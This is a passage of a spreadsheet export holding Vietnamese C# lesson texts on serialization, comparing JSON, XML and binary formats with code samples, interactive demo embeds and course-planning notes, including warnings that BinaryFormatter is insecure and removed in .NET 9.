Serialization không chỉ là một kỹ thuật thú vị mà còn là một công cụ cực kỳ mạnh mẽ và cần thiết trong phát triển ứng dụng hiện đại. Nó phục vụ nhiều mục đích quan trọng:
1. Lưu trữ trạng thái ứng dụng (Persistence)
Một trong những ứng dụng phổ biến nhất của serialization là để lưu trữ trạng thái của ứng dụng hoặc các đối tượng cụ thể. Điều này cho phép ứng dụng "ghi nhớ" nơi nó đã dừng lại hoặc các cài đặt của người dùng.
Lưu tiến trình game: Khi bạn chơi game và muốn lưu lại, các đối tượng đại diện cho trạng thái game (vị trí nhân vật, vật phẩm trong kho, điểm số, v.v.) sẽ được serialize và lưu vào một tệp. Khi bạn tải game, chúng sẽ được deserialize để khôi phục trạng thái đó.
Lưu cấu hình người dùng: Các cài đặt tùy chỉnh của người dùng (chủ đề giao diện, ngôn ngữ, tùy chọn hiển thị) thường được lưu dưới dạng serialize các đối tượng cấu hình vào một tệp cấu hình.
Lưu trữ dữ liệu tạm thời: Trong các ứng dụng phức tạp, bạn có thể cần lưu trữ một tập hợp đối tượng tạm thời giữa các phiên làm việc hoặc để phục hồi sau sự cố.
2. Trao đổi dữ liệu giữa các hệ thống (Data Exchange)
Trong kiến trúc ứng dụng hiện đại, các hệ thống thường cần giao tiếp và trao đổi dữ liệu với nhau. Serialization là xương sống của quá trình này.
Web Services và APIs: Khi một ứng dụng di động gọi một API trên máy chủ, dữ liệu thường được serialize thành JSON hoặc XML để gửi đi. Máy chủ nhận dữ liệu, deserialize nó thành các đối tượng để xử lý, sau đó serialize kết quả và gửi lại cho ứng dụng di động.
Message Queues: Trong các hệ thống phân tán, các thông điệp (messages) thường là các đối tượng được serialize để gửi qua các hàng đợi tin nhắn (message queues) giữa các dịch vụ khác nhau.
Truyền dữ liệu qua mạng: Bất cứ khi nào bạn cần gửi một đối tượng phức tạp qua mạng từ một ứng dụng này sang một ứng dụng khác (có thể trên các máy tính khác nhau), bạn phải serialize nó thành một định dạng "phẳng" có thể truyền tải được.
3. Sao chép đối tượng (Object Cloning / Deep Copy)
Trong C#, việc gán một đối tượng cho một biến khác thường chỉ tạo ra một bản sao tham chiếu (shallow copy). Điều này có nghĩa là cả hai biến đều trỏ đến cùng một đối tượng trong bộ nhớ. Nếu bạn thay đổi đối tượng thông qua một biến, biến còn lại cũng sẽ thấy sự thay đổi đó.
Serialization cung cấp một cách để tạo ra một bản sao độc lập hoàn toàn của một đối tượng, bao gồm tất cả các đối tượng con mà nó tham chiếu (deep copy).
Cách hoạt động: Bạn serialize đối tượng gốc thành một chuỗi byte, sau đó ngay lập tức deserialize chuỗi byte đó thành một đối tượng mới. Đối tượng mới này sẽ là một bản sao hoàn chỉnh, độc lập với đối tượng gốc, không chia sẻ bất kỳ tham chiếu nào đến các đối tượng con.
Hiểu rõ về serialization và deserialization là nền tảng quan trọng để bạn có thể xây dựng các ứng dụng C# mạnh mẽ, có khả năng lưu trữ dữ liệu, giao tiếp hiệu quả và quản lý đối tượng một cách linh hoạt. Trong các bài học tiếp theo, chúng ta sẽ đi sâu vào các loại serialization cụ thể được sử dụng trong C# và cách triển khai chúng.</t>
        </is>
      </c>
      <c r="W54" s="22" t="inlineStr">
        <is>
          <t># Khái niệm Serialization là gì?
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Giải thích vì sao đối tượng trong bộ nhớ (RAM) sẽ mất khi chương trình tắt.
- Định nghĩa **Serialization** (tuần tự hóa) và **Deserialization** (giải tuần tự hóa).
- Kể tên các mục đích chính của serialization: lưu trữ, trao đổi dữ liệu, sao chép sâu.
- Viết ví dụ ngắn dùng `JsonSerializer` để lưu và đọc lại một đối tượng.
- Quan sát đối tượng `Person` được chuyển thành chuỗi JSON rồi dựng lại bằng hoạt động mô phỏng.
## Vấn đề: đối tượng nằm trong RAM
Khi chương trình chạy, các đối tượng nằm trong bộ nhớ RAM. Chúng giữ dữ liệu và trạng thái của ứng dụng tại một thời điểm. Nhưng khi chương trình đóng, toàn bộ đối tượng biến mất. Vậy làm sao để:
- **Lưu** trạng thái của một đối tượng, rồi dùng lại ở lần chạy sau?
- **Gửi** đối tượng đó cho một ứng dụng khác?
Câu trả lời là **serialization**.
## Serialization là gì?
**Serialization** (tuần tự hóa) là quá trình chuyển trạng thái của một đối tượng thành một dạng có thể **lưu trữ hoặc truyền đi**, thường là:
- một chuỗi văn bản, ví dụ **JSON** hoặc XML;
- hoặc một chuỗi byte (dạng nhị phân).
Hãy hình dung đối tượng như một tòa nhà. Serialization giống như vẽ ra bản thiết kế chi tiết của tòa nhà, đủ thông tin để xây lại y hệt ở nơi khác.
**Deserialization** (giải tuần tự hóa) là chiều ngược lại: đọc dạng đã lưu rồi dựng lại một đối tượng với các giá trị như ban đầu.
| Chiều | Đầu vào | Đầu ra |
|---|---|---|
| Serialize | đối tượng trong RAM | chuỗi (hoặc byte) |
| Deserialize | chuỗi (hoặc byte) | đối tượng mới trong RAM |
## Ví dụ với `System.Text.Json`
Trong .NET hiện đại, cách phổ biến để làm việc với JSON là lớp `JsonSerializer` trong namespace `System.Text.Json`. Dưới đây là lớp `Person` có hai thuộc tính `Name` và `Age`.
```csharp
using System;
using System.IO;
using System.Text.Json;
public class Person
{
    public string Name { get; set; }
    public int Age { get; set; }
}
public class Program
{
    public static void Main()
    {
        // Lần chạy 1: lưu
        var p = new Person { Name = "An", Age = 20 };
        string json = JsonSerializer.Serialize(p);
        Console.WriteLine(json);   // {"Name":"An","Age":20}
        File.WriteAllText("p.json", json);
        // Lần chạy sau: đọc lại
        string text = File.ReadAllText("p.json");
        Person p2 = JsonSerializer.Deserialize&lt;Person&gt;(text);
        Console.WriteLine(p2.Name);   // An
    }
}
```
Hai điểm cần nhớ:
- `Serialize(p)` chỉ **đọc** `p` rồi tạo ra chuỗi. `p` vẫn còn nguyên trong RAM.
- `Deserialize&lt;Person&gt;(text)` tạo ra một đối tượng **hoàn toàn mới**. `p2` có dữ liệu y hệt `p`, nhưng không phải cùng một đối tượng.
## Tại sao serialization quan trọng?
### Lưu trữ trạng thái (persistence)
Cho phép ứng dụng "nhớ" dữ liệu giữa các lần chạy:
- **Lưu tiến trình game:** vị trí nhân vật, vật phẩm, điểm số được serialize vào tệp, và deserialize khi tải game.
- **Lưu cấu hình người dùng:** giao diện, ngôn ngữ, tùy chọn hiển thị.
- **Lưu dữ liệu tạm** để phục hồi sau sự cố.
### Trao đổi dữ liệu giữa các hệ thống
Các hệ thống giao tiếp với nhau bằng dữ liệu dạng "phẳng":
- **Web API:** ứng dụng di động gửi JSON lên máy chủ; máy chủ deserialize để xử lý, rồi serialize kết quả gửi về.
- **Hàng đợi tin nhắn (message queue):** mỗi thông điệp là một đối tượng đã serialize.
- **Truyền qua mạng:** đối tượng phức tạp phải được chuyển thành dạng truyền được.
### Sao chép sâu (deep copy)
Gán `b = a` chỉ sao chép **tham chiếu**: hai biến cùng trỏ một đối tượng. Nếu cần một bản sao độc lập, kể cả các đối tượng con bên trong, ta có thể serialize `a` rồi deserialize ngay thành đối tượng mới. Cách này tiện, nhưng chậm hơn so với việc tự viết code sao chép.
## Lưu ý về an toàn
Trong tài liệu cũ, bạn có thể gặp `BinaryFormatter`, một cách serialize nhị phân. Hiện nay nó **không còn được khuyến nghị**: nó không an toàn khi đọc dữ liệu từ nguồn không tin cậy và đã bị loại bỏ khỏi .NET 9. Với dữ liệu mới, hãy dùng định dạng văn bản có cấu trúc như JSON với `System.Text.Json`.
## Hoạt động: Serialize và Deserialize
Mô phỏng dưới đây có hai chiều, mỗi chiều một tab. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Serialize**. Đầu tiên, lớp `Person` có `Name` và `Age`, RAM chưa có đối tượng và ổ đĩa chưa có tệp. Dòng `new` tạo `Person#1` với `Name = "An"`, `Age = 20` trong RAM. Bước `Serialize(p)` biến nó thành chuỗi `{"Name":"An","Age":20}`; hình hiện thẻ `string json` và `Person#1` vẫn còn nguyên ở RAM. Bước `File.WriteAllText` ghi chuỗi vào tệp `p.json`, và bên cột "Ổ đĩa" xuất hiện nội dung tệp màu xanh.
- Chuyển sang tab **Deserialize**. Đây là lần chạy sau: chương trình mới bật, RAM trống (thẻ "Person#1 đã mất khi tắt chương trình") nhưng `p.json` vẫn còn trên ổ đĩa. `File.ReadAllText` đọc nội dung thành chuỗi `json`: lúc này nó mới chỉ là chữ, chưa phải đối tượng.
- Bước `Deserialize&lt;Person&gt;` dựng `Person#2` với `Name = "An"`, `Age = 20`. Dòng `Console.WriteLine(p2.Name)` in `An`. Bước cuối cho thấy dữ liệu y hệt `Person#1`, nhưng đây là một đối tượng mới hoàn toàn.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/luu-tru-doi-tuong-voi-serialization/gioi-thieu-ve-serialization-va-khai-niem-co-ban/khai-niem-serialization-la-gi/" title="Serialization là gì?" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: serialize biến đối tượng thành chuỗi (hoặc byte) để lưu hoặc gửi đi; deserialize dựng lại đối tượng từ dạng đó. Dữ liệu được giữ nguyên qua hai bước, nhưng đối tượng nhận lại là một đối tượng mới.
## Tóm tắt
- Đối tượng trong RAM mất khi chương trình tắt; serialization giúp lưu hoặc gửi chúng đi.
- **Serialize** là đối tượng thành chuỗi hoặc byte; **Deserialize** là chiều ngược lại.
- Với JSON trong .NET, dùng `JsonSerializer.Serialize` và `JsonSerializer.Deserialize&lt;T&gt;`.
- Đối tượng sau deserialize có dữ liệu giống bản gốc nhưng là đối tượng mới.
- Mục đích chính: lưu trữ trạng thái, trao đổi dữ liệu, sao chép sâu.
- Tránh `BinaryFormatter`; ưu tiên `System.Text.Json`.</t>
        </is>
      </c>
    </row>
    <row r="55" ht="409.6" customHeight="1" s="18">
      <c r="A55" s="10" t="n">
        <v>55</v>
      </c>
      <c r="B55" s="10" t="inlineStr">
        <is>
          <t>6. Lưu trữ Đối tượng với Serialization</t>
        </is>
      </c>
      <c r="C55" s="10" t="inlineStr">
        <is>
          <t>Giới Thiệu về Serialization và Khái Niệm Cơ Bản</t>
        </is>
      </c>
      <c r="D55" s="10" t="inlineStr">
        <is>
          <t>Các loại Serialization phổ biến trong C#</t>
        </is>
      </c>
      <c r="E55" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F55" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G55" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H55" s="10" t="inlineStr">
        <is>
          <t>Nhìn cùng một đối tượng ở 3 định dạng và so sánh độ dễ đọc, kích thước.</t>
        </is>
      </c>
      <c r="I55" s="10" t="inlineStr">
        <is>
          <t>1 cột, 3 tab</t>
        </is>
      </c>
      <c r="J55" s="10" t="inlineStr">
        <is>
          <t>Thẻ đối tượng cố định ở trên; khung kết quả đổi theo tab: JSON (tô màu khóa/giá trị), XML (cây thẻ mở/đóng), Nhị phân (dải ô hex, không đọc được). Thanh kích thước so sánh số byte, tính từ dữ liệu thật.</t>
        </is>
      </c>
      <c r="K55" s="10" t="inlineStr">
        <is>
          <t>H19, H20</t>
        </is>
      </c>
      <c r="L55" s="10" t="inlineStr">
        <is>
          <t>JSON | XML | Nhị phân</t>
        </is>
      </c>
      <c r="M55" s="10" t="inlineStr">
        <is>
          <t>JSON: {"Id":7,"Name":"Bút","Price":5000}, ghi số byte.
XML: &lt;Product&gt;&lt;Id&gt;7&lt;/Id&gt;&lt;Name&gt;Bút&lt;/Name&gt;&lt;Price&gt;5000&lt;/Price&gt;&lt;/Product&gt;, ghi số byte.
Nhị phân: 13 byte do BinaryWriter ghi (xem bài Binary Serialization).
Bước cuối: bảng so sánh dễ đọc / kích thước / dùng khi nào.</t>
        </is>
      </c>
      <c r="N55" s="10" t="inlineStr">
        <is>
          <t>Product { Id = 7, Name = "Bút", Price = 5000 }</t>
        </is>
      </c>
      <c r="O55" s="10" t="inlineStr">
        <is>
          <t>JSON gọn và dễ đọc (phổ biến nhất); XML dài hơn nhưng chặt chẽ; nhị phân gọn nhất nhưng người không đọc được.</t>
        </is>
      </c>
      <c r="P55" s="10" t="inlineStr">
        <is>
          <t>CẢNH BÁO: BinaryFormatter đã lỗi thời từ .NET 5 và bị loại bỏ trong .NET 9 (gọi sẽ ném exception) vì rủi ro bảo mật. Tab nhị phân dùng BinaryWriter để minh họa.</t>
        </is>
      </c>
      <c r="Q55" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/luu-tru-doi-tuong-voi-serialization/gioi-thieu-ve-serialization-va-khai-niem-co-ban/cac-loai-serialization-pho-bien-trong-c-sharp/index.html</t>
        </is>
      </c>
      <c r="R55" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/luu-tru-doi-tuong-voi-serialization/gioi-thieu-ve-serialization-va-khai-niem-co-ban/cac-loai-serialization-pho-bien-trong-c-sharp/</t>
        </is>
      </c>
      <c r="S55" s="10" t="inlineStr">
        <is>
          <t>Học liệu chương này dựa nhiều vào BinaryFormatter: đề xuất cập nhật nội dung bài.</t>
        </is>
      </c>
      <c r="T55" s="12" t="n"/>
      <c r="U55" s="12" t="n"/>
      <c r="V55" s="21" t="inlineStr">
        <is>
          <t>Các loại Serialization phổ biến trong C#
Sau khi đã nắm vững khái niệm về Serialization và tầm quan trọng của nó trong việc lưu trữ trạng thái đối tượng, chúng ta sẽ đi sâu vào tìm hiểu các phương pháp Serialization phổ biến mà C# và .NET cung cấp. Mỗi phương pháp có những đặc điểm, ưu và nhược điểm riêng, phù hợp với các mục đích sử dụng khác nhau. Việc lựa chọn đúng loại Serialization sẽ giúp ứng dụng của bạn hoạt động hiệu quả và linh hoạt hơn.
Binary Serialization
Binary Serialization là quá trình chuyển đổi trạng thái của một đối tượng thành một luồng byte nhị phân. Dữ liệu được serialize dưới dạng nhị phân, không thể đọc hiểu trực tiếp bằng mắt thường.
Ưu điểm:
Hiệu quả và nhỏ gọn: Dữ liệu nhị phân thường có kích thước nhỏ gọn hơn so với các định dạng văn bản như XML hay JSON, giúp tiết kiệm không gian lưu trữ và băng thông truyền tải.
Bảo toàn kiểu dữ liệu: Binary Serialization có khả năng bảo toàn chính xác kiểu dữ liệu và cấu trúc đối tượng ban đầu, bao gồm cả các trường private (private fields). Điều này rất hữu ích khi bạn cần lưu trữ và khôi phục một đối tượng phức tạp mà không làm mất bất kỳ thông tin nào.
Tốc độ: Quá trình serialize và deserialize thường nhanh hơn vì không cần phân tích cú pháp (parsing) như các định dạng văn bản.
Nhược điểm:
Khó đọc và không thân thiện với con người: Dữ liệu nhị phân không thể đọc được bằng mắt thường, gây khó khăn cho việc kiểm tra, gỡ lỗi hoặc chỉnh sửa thủ công.
Phụ thuộc phiên bản .NET: Các đối tượng được serialize bằng Binary Serialization có thể gặp vấn đề về khả năng tương thích khi deserialize trên một phiên bản .NET Framework hoặc .NET khác, hoặc thậm chí khi cấu trúc lớp đối tượng thay đổi giữa các phiên bản ứng dụng. Điều này làm cho nó ít phù hợp hơn cho việc trao đổi dữ liệu giữa các hệ thống không cùng nền tảng.
Vấn đề bảo mật: Việc sử dụng BinaryFormatter (lớp chính để thực hiện Binary Serialization) đã được khuyến cáo là không an toàn trong các phiên bản .NET Core và .NET 5+ trở lên do tiềm ẩn các lỗ hổng bảo mật khi deserialize dữ liệu từ nguồn không tin cậy.
Ví dụ về cách sử dụng (chỉ để minh họa khái niệm):
Mặc dù BinaryFormatter không được khuyến khích cho các ứng dụng hiện đại, nhưng nó là ví dụ điển hình cho Binary Serialization.
using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;
[Serializable]
public class NhanVien
{
    public int MaNhanVien { get; set; }
    public string Ten { get; set; }
    private decimal Luong { get; set; } // Private field cũng được serialize
    public NhanVien(int ma, string ten, decimal luong)
    {
        MaNhanVien = ma;
        Ten = ten;
        Luong = luong;
    }
    public void HienThiThongTin()
    {
        Console.WriteLine($"Mã: {MaNhanVien}, Tên: {Ten}, Lương: {Luong}");
    }
}
// Cách serialize (ví dụ)
public class BinarySerializationExample
{
    public static void LuuNhanVien(NhanVien nv, string tenFile)
    {
        using (FileStream fs = new FileStream(tenFile, FileMode.Create))
        {
            BinaryFormatter formatter = new BinaryFormatter();
            formatter.Serialize(fs, nv);
        }
        Console.WriteLine("Đối tượng NhanVien đã được serialize thành công.");
    }
    public static NhanVien DocNhanVien(string tenFile)
    {
        using (FileStream fs = new FileStream(tenFile, FileMode.Open))
        {
            BinaryFormatter formatter = new BinaryFormatter();
            return (NhanVien)formatter.Deserialize(fs);
        }
    }
}
XML Serialization
XML Serialization là quá trình chuyển đổi các thuộc tính công khai (public properties) và trường công khai (public fields) của một đối tượng thành định dạng XML (Extensible Markup Language). XML là một định dạng văn bản có cấu trúc, dễ đọc và được sử dụng rộng rãi.
Ưu điểm:
Dễ đọc và thân thiện với con người: Dữ liệu XML có cấu trúc rõ ràng, dễ dàng đọc hiểu, kiểm tra và chỉnh sửa bằng trình soạn thảo văn bản.
Tương thích đa nền tảng: XML là một tiêu chuẩn mở, cho phép trao đổi dữ liệu giữa các ứng dụng được phát triển bằng các ngôn ngữ và nền tảng khác nhau. Điều này làm cho XML Serialization trở thành lựa chọn tốt cho việc tích hợp hệ thống.
Dễ dàng kiểm tra và gỡ lỗi: Nhờ tính dễ đọc, việc xác định lỗi trong dữ liệu XML trở nên đơn giản hơn.
Nhược điểm:
Kích thước file lớn: Dữ liệu XML thường lớn hơn đáng kể so với dữ liệu nhị phân do có nhiều thẻ (tag) mô tả cấu trúc. Điều này có thể ảnh hưởng đến hiệu suất và không gian lưu trữ, đặc biệt với các đối tượng phức tạp hoặc số lượng lớn dữ liệu.
Không serialize private fields: Theo mặc định, XmlSerializer chỉ serialize các thuộc tính và trường công khai. Các trường private hoặc các phương thức sẽ không được lưu trữ.
Yêu cầu cấu trúc lớp cụ thể: Đôi khi cần sử dụng các thuộc tính (attributes) như [XmlElement], [XmlAttribute], [XmlIgnore] để kiểm soát cách đối tượng được serialize thành XML, điều này có thể làm phức tạp mã nguồn.
Ví dụ về XML Serialization:
using System;
using System.IO;
using System.Xml.Serialization;
public class SanPham
{
    public string MaSanPham { get; set; }
    public string TenSanPham { get; set; }
    public decimal GiaBan { get; set; }
    // Private field này sẽ không được serialize bởi XmlSerializer
    private string MoTaNoiBo { get; set; } 
    public SanPham() { } // Cần constructor không tham số cho XmlSerializer
    public SanPham(string ma, string ten, decimal gia)
    {
        MaSanPham = ma;
        TenSanPham = ten;
        GiaBan = gia;
        MoTaNoiBo = "Thông tin bí mật";
    }
}
public class XmlSerializationExample
{
    public static void LuuSanPham(SanPham sp, string tenFile)
    {
        XmlSerializer serializer = new XmlSerializer(typeof(SanPham));
        using (TextWriter writer = new StreamWriter(tenFile))
        {
            serializer.Serialize(writer, sp);
        }
        Console.WriteLine("Đối tượng SanPham đã được serialize thành công.");
    }
    public static SanPham DocSanPham(string tenFile)
    {
        XmlSerializer serializer = new XmlSerializer(typeof(SanPham));
        using (TextReader reader = new StreamReader(tenFile))
        {
            return (SanPham)serializer.Deserialize(reader);
        }
    }
}
JSON Serialization
JSON Serialization là quá trình chuyển đổi các thuộc tính công khai của đối tượng thành định dạng JSON (JavaScript Object Notation). JSON đã trở nên cực kỳ phổ biến trong phát triển web và API do tính đơn giản, dễ đọc và hiệu quả của nó.
Ưu điểm:
Phổ biến cho web và API: JSON là định dạng tiêu chuẩn để trao đổi dữ liệu giữa các ứng dụng web, dịch vụ RESTful API. Hầu hết các ngôn ngữ lập trình đều có thư viện hỗ trợ JSON.
Dễ đọc và thân thiện với con người: Tương tự XML, JSON cũng là định dạng văn bản có cấu trúc, dễ đọc và hiểu.
Nhẹ hơn XML: So với XML, JSON thường có cú pháp gọn gàng hơn, ít "nhiễu" (noise) từ các thẻ đóng/mở, dẫn đến kích thước file thường nhỏ hơn.
Hiệu suất tốt: Quá trình serialize/deserialize JSON thường nhanh hơn XML.
Nhược điểm:
Không bảo toàn kiểu dữ liệu như binary: Giống như XML, JSON không tự động lưu trữ thông tin kiểu dữ liệu đầy đủ của đối tượng. Khi deserialize, bạn cần biết kiểu dữ liệu đích để khôi phục chính xác.
Cần thư viện hỗ trợ: Mặc dù .NET hiện đại (Core/5+) có System.Text.Json tích hợp, các phiên bản .NET Framework cũ hơn hoặc các trường hợp phức tạp hơn có thể cần đến các thư viện bên thứ ba mạnh mẽ như Newtonsoft.Json (Json.NET).
Không serialize private fields: Theo mặc định, System.Text.Json và Newtonsoft.Json đều chỉ serialize các thuộc tính công khai.
Ví dụ về JSON Serialization (sử dụng System.Text.Json):
using System;
using System.IO;
using System.Text.Json;
public class DonHang
{
    public int MaDonHang { get; set; }
    public DateTime NgayDatHang { get; set; }
    public string TenKhachHang { get; set; }
    public decimal TongTien { get; set; }
    // Private field này sẽ không được serialize
    private string GhiChuNoiBo { get; set; }
    public DonHang(int ma, DateTime ngay, string khachHang, decimal tong)
    {
        MaDonHang = ma;
        NgayDatHang = ngay;
        TenKhachHang = khachHang;
        TongTien = tong;
        GhiChuNoiBo = "Đơn hàng ưu tiên";
    }
}
public class JsonSerializationExample
{
    public static void LuuDonHang(DonHang dh, string tenFile)
    {
        string jsonString = JsonSerializer.Serialize(dh, new JsonSerializerOptions { WriteIndented = true });
        File.WriteAllText(tenFile, jsonString);
        Console.WriteLine("Đối tượng DonHang đã được serialize thành công.");
    }
    public static DonHang DocDonHang(string tenFile)
    {
        string jsonString = File.ReadAllText(tenFile);
        return JsonSerializer.Deserialize&lt;DonHang&gt;(jsonString);
    }
}
Lựa chọn loại Serialization phù hợp
Việc lựa chọn loại Serialization phụ thuộc vào yêu cầu cụ thể của ứng dụng:
Binary Serialization: Phù hợp khi bạn cần hiệu suất cao, kích thước dữ liệu nhỏ nhất và bảo toàn toàn bộ trạng thái đối tượng, thường là cho việc lưu trữ nội bộ giữa các ứng dụng .NET cùng phiên bản, hoặc truyền dữ liệu trong cùng một tiến trình. Tuy nhiên, cần cân nhắc các vấn đề bảo mật và tương thích phiên bản.
XML Serialization: Là lựa chọn tốt khi bạn cần một định dạng dữ liệu dễ đọc, có cấu trúc tốt, và đặc biệt khi cần trao đổi dữ liệu với các hệ thống không phải .NET hoặc các dịch vụ sử dụng XML làm chuẩn. Thường được dùng cho các file cấu hình.
JSON Serialization: Là lựa chọn hàng đầu cho các ứng dụng web, API RESTful và khi cần trao đổi dữ liệu hiệu quả, dễ đọc với các hệ thống hiện đại. Nó cân bằng tốt giữa tính dễ đọc và hiệu quả về kích thước.
Hiểu rõ ưu nhược điểm của từng loại sẽ giúp bạn đưa ra quyết định sáng suốt, tối ưu hóa hiệu suất và khả năng bảo trì cho ứng dụng C# của mình.</t>
        </is>
      </c>
      <c r="W55" s="22" t="inlineStr">
        <is>
          <t># Các loại Serialization phổ biến trong C#
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Kể tên ba định dạng serialization phổ biến: JSON, XML và nhị phân.
- So sánh ba định dạng về độ dễ đọc, kích thước và nơi thường dùng.
- Nhận ra lớp hoặc thư viện C# đi cùng mỗi định dạng: `JsonSerializer`, `XmlSerializer`, `BinaryWriter`.
- Chọn định dạng phù hợp với một tình huống cụ thể.
- Quan sát cùng một đối tượng được lưu thành ba định dạng và so sánh số byte bằng hoạt động mô phỏng.
## Cùng một đối tượng, nhiều cách lưu
**Serialization** là biến một đối tượng trong bộ nhớ thành chuỗi văn bản hoặc dãy byte để lưu hay gửi đi. Câu hỏi là: lưu theo **định dạng** (format) nào? Mỗi định dạng có điểm mạnh và điểm yếu riêng.
Trong bài này, cả ba định dạng đều lưu cùng một đối tượng `Product`:
```csharp
public class Product
{
    public int Id { get; set; }
    public string Name { get; set; }
    public int Price { get; set; }
}
```
Giá trị cụ thể: `Id = 7`, `Name = "Bút"`, `Price = 5000`.
## JSON
**JSON** (JavaScript Object Notation) là định dạng văn bản gồm các cặp `"khóa": giá trị`. Trong .NET hiện đại, ta dùng lớp `JsonSerializer` của thư viện `System.Text.Json`, có sẵn, không cần cài thêm gói.
```csharp
using System;
using System.Text;
using System.Text.Encodings.Web;
using System.Text.Json;
public class Product
{
    public int Id { get; set; }
    public string Name { get; set; }
    public int Price { get; set; }
}
public class Program
{
    public static void Main()
    {
        var p = new Product { Id = 7, Name = "Bút", Price = 5000 };
        var options = new JsonSerializerOptions
        {
            // Mặc định ký tự có dấu bị mã hóa thành ú.
            // Dòng này giữ nguyên chữ "ú" để dễ đọc.
            Encoder = JavaScriptEncoder.UnsafeRelaxedJsonEscaping
        };
        string s = JsonSerializer.Serialize(p, options);
        Console.WriteLine(s);                           // {"Id":7,"Name":"Bút","Price":5000}
        Console.WriteLine(Encoding.UTF8.GetByteCount(s)); // 35
    }
}
```
- **Ưu điểm:** dễ đọc, gọn hơn XML, hầu hết ngôn ngữ đều hỗ trợ. Là lựa chọn phổ biến nhất cho web và API.
- **Nhược điểm:** không ghi kèm kiểu dữ liệu, nên khi đọc lại ta phải nói rõ đang đọc ra kiểu nào. Mặc định chỉ ghi thuộc tính public.
## XML
**XML** (Extensible Markup Language) ghi mỗi thuộc tính thành một **phần tử** có thẻ mở và thẻ đóng. Trong C#, ta dùng `XmlSerializer` trong `System.Xml.Serialization`.
```csharp
using System;
using System.IO;
using System.Xml.Serialization;
public class Product
{
    public int Id { get; set; }
    public string Name { get; set; }
    public int Price { get; set; }
}
public class Program
{
    public static void Main()
    {
        var p = new Product { Id = 7, Name = "Bút", Price = 5000 };
        var xs = new XmlSerializer(typeof(Product));
        using var sw = new StringWriter();
        xs.Serialize(sw, p);
        Console.WriteLine(sw.ToString());
        // &lt;Product&gt;&lt;Id&gt;7&lt;/Id&gt;&lt;Name&gt;Bút&lt;/Name&gt;&lt;Price&gt;5000&lt;/Price&gt;&lt;/Product&gt;
        // (bản chạy thật còn có dòng khai báo xml, thụt lề và xmlns; bài này viết gọn lại)
    }
}
```
- **Ưu điểm:** cấu trúc chặt chẽ, tự mô tả, nhiều hệ thống cũ và tệp cấu hình vẫn dùng.
- **Nhược điểm:** dài dòng vì mỗi giá trị phải kèm thẻ mở và thẻ đóng. `XmlSerializer` chỉ ghi thành viên public và cần lớp có constructor không tham số.
## Nhị phân
**Nhị phân** (binary) lưu dữ liệu thành các byte thô, không phải chữ. Cách đơn giản và an toàn là dùng `BinaryWriter` ghi từng trường theo thứ tự (bài sau sẽ đi sâu).
```csharp
using System;
using System.IO;
public class Program
{
    public static void Main()
    {
        using var ms = new MemoryStream();
        using var w = new BinaryWriter(ms);
        w.Write(7);        // Id: 4 byte
        w.Write("Bút");    // Name: 1 byte độ dài + 4 byte UTF-8
        w.Write(5000);     // Price: 4 byte
        Console.WriteLine(ms.Length); // 13
    }
}
```
- **Ưu điểm:** gọn nhất, đọc và ghi nhanh.
- **Nhược điểm:** người không đọc được, và không có tên trường đi kèm. Muốn đọc lại, ta phải biết đúng thứ tự và kiểu của từng trường.
&gt; **Lưu ý:** bạn có thể gặp tài liệu cũ dạy lưu nhị phân bằng `BinaryFormatter`. Lớp này **không an toàn** (đọc dữ liệu không đáng tin có thể bị tấn công) và đã bị loại bỏ trong .NET 9, nên không dùng cho code mới. Khi cần nhị phân, hãy tự ghi bằng `BinaryWriter`, hoặc chọn JSON.
## So sánh ba định dạng
| Định dạng | Dễ đọc | Số byte (ví dụ `Product`) | Dùng khi |
|---|---|---|---|
| JSON | Rất dễ | 35 | Trao đổi dữ liệu web, API |
| XML | Dễ, dài dòng | 65 | Cấu hình, hệ thống cũ |
| Nhị phân | Không đọc được | 13 | Cần gọn, nhanh |
## Hoạt động: Một đối tượng, ba định dạng
Mô phỏng dưới đây lưu cùng một đối tượng `Product` thành ba kiểu khác nhau. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **JSON**. `JsonSerializer.Serialize` biến `p` thành chuỗi `{"Id":7,"Name":"Bút","Price":5000}`. Hình hiện chuỗi JSON, mỗi cặp khóa và giá trị rõ ràng. Cuối cùng thanh kích thước cho thấy **35 byte** (chữ "ú" chiếm 2 byte).
- Chuyển sang tab **XML**. `XmlSerializer` ghi mỗi thuộc tính thành một phần tử, ví dụ giá trị 7 nằm giữa `&lt;Id&gt;` và `&lt;/Id&gt;`. Thanh kích thước cho thấy **65 byte**, nhiều hơn JSON vì phải lặp lại tên thẻ.
- Mở tab **Nhị phân**. `BinaryWriter` ghi từng trường vào dải byte (hex), mỗi trường một màu: `Id` 4 byte, độ dài 1 byte, `Name` 4 byte, `Price` 4 byte. Tổng cộng **13 byte**, gọn nhất. Nhưng khung "Mở như văn bản" chỉ toàn ký tự lạ. Cuối mỗi tab có bảng so sánh ba định dạng, dòng của tab hiện tại được tô sáng.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/luu-tru-doi-tuong-voi-serialization/gioi-thieu-ve-serialization-va-khai-niem-co-ban/cac-loai-serialization-pho-bien-trong-c-sharp/" title="Các loại Serialization" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: cùng một dữ liệu nhưng ba định dạng cho ba kết quả khác nhau. JSON dễ đọc và gọn vừa phải, XML dài hơn nhưng chặt chẽ, nhị phân gọn nhất nhưng người không đọc được.
## Chọn định dạng nào?
- **JSON:** lựa chọn mặc định cho ứng dụng hiện đại, web, API và tệp cấu hình đơn giản.
- **XML:** khi làm việc với hệ thống hoặc chuẩn đã dùng XML.
- **Nhị phân:** khi cần tiết kiệm dung lượng hoặc tốc độ và chỉ chương trình của bạn đọc dữ liệu đó.
## Tóm tắt
